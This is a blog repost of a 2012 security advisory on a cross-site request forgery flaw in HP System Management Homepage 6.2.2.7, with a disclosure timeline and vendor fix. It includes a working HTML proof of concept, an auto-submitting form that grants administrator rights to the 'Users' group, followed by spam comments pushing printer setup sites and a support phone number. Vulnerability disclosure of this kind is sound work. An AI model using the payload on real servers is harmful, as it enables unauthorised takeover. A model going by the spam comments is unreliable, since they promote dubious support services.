Friday 11 January 2013

HP System Management Homepage 6.2.2.7 Cross-Site Request Forgery (CSRF) Vulnerability


Description
HP System Management Homepage is a web-based interface that consolidates and simplifies the management of individual ProLiant and Integrity servers running Microsoft Windows or Linux operating systems, or HP 9000 and HP Integrity servers running HP-UX 11i.

Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Request Forgery vulnerability in HP System Management Homepage. This issue was discovered in a default installation of HP System Management Homepage 6.2.2.7. Other earlier versions may also be affected.

 Proof of concept
<html>
<body>
<form action="https://[target]:2381/proxy/SetSMHData" id="csrf" method="post">
<input type="hidden" name="admin-group" value="Users" />
<input type="hidden" name="operator-group" value="" />
<input type="hidden" name="user-group" value="" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Solution
HP has provided HP System Management Homepage v7.0 or subsequent to resolve the vulnerabilities. Please see the references for more information.

References
Vendor URL: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03280632
Secunia: http://secunia.com/advisories/43012/

 Disclosure Timeline
2011-01-21 - Vulnerability discovered.
2011-01-21 - Vulnerability reported to Secunia.
2011-01-21 - Secunia confirmed the vulnerability and contacted the vendor.
2012-04-11 - Advisory published by Secunia since it has been coordinated for more than a year.
2012-04-19 - Patch released.
2012-04-20 - Advisory updated by Secunia.

Posted by at

14 comments:

  1. michal rane12 February 2019 at 04:15

    123.hp.com/setup

    ReplyDelete
  2. Franklin clement27 February 2019 at 02:44

    123.hp.com/envy 5660

    ReplyDelete
  3. milo kith13 March 2019 at 21:30

    123.hp.com/setup 7100

    ReplyDelete
  4. Ritchie ken21 March 2019 at 04:04

    123.hp.com/setup 5200

    ReplyDelete
  5. Franklin25 March 2019 at 22:07

    123.hp.com/setup 2634

    ReplyDelete
  6. Gaju Mekha26 March 2019 at 03:00

    123.hp.com/setup 4657

    ReplyDelete
  7. Debriefing News6 May 2019 at 02:20

    123.hp.com printer setup

    ReplyDelete
  8. markerchertok11 June 2019 at 00:05

    123 hp.com

    ReplyDelete
  9. micky8 August 2019 at 21:27

    Healthcare

    ReplyDelete
  10. ianmoses799 October 2019 at 00:23

    If your printer loses its connectivity with your wireless device often, check for the distance between the wireless Router and the Epson printer. Additionally, if there are any barriers affecting the network connectivity, please get rid of them.
    Contact us to discuss more on Epson Printer Troubleshooting at Epson Connect Printer Setup

    ReplyDelete
  11. Alex Jones15 October 2019 at 06:05

    123.hp.com/setup guide will provide you information on the setup steps to be done. Select the best device to get all your print outs. If the device is new it's the first time printer setup that you have to do. Slide all the hardware requirements. Get the valid software and install it on the device. Resolve the errors right away.
    For more assistance, you can make a note of the customer support number and dial it right away @ +1-844-876-5110.

    ReplyDelete
  12. Sharma26 October 2019 at 04:37

    hp officejet pro 9013 setup

    ReplyDelete
  13. Officesetup12 January 2020 at 21:36

    If you search best technical support for TurboTax Support and Office.com/setup then you can visit here and resolve you problem immediately. Because our expert always provide the best and satisfy solution.

    Office.com/setup
    TurboTax Support
    123hp.com/setup

    ReplyDelete
  14. danielhavery28 February 2020 at 02:10

    Epson XP 960

    ReplyDelete

Subscribe to: Post Comments (Atom)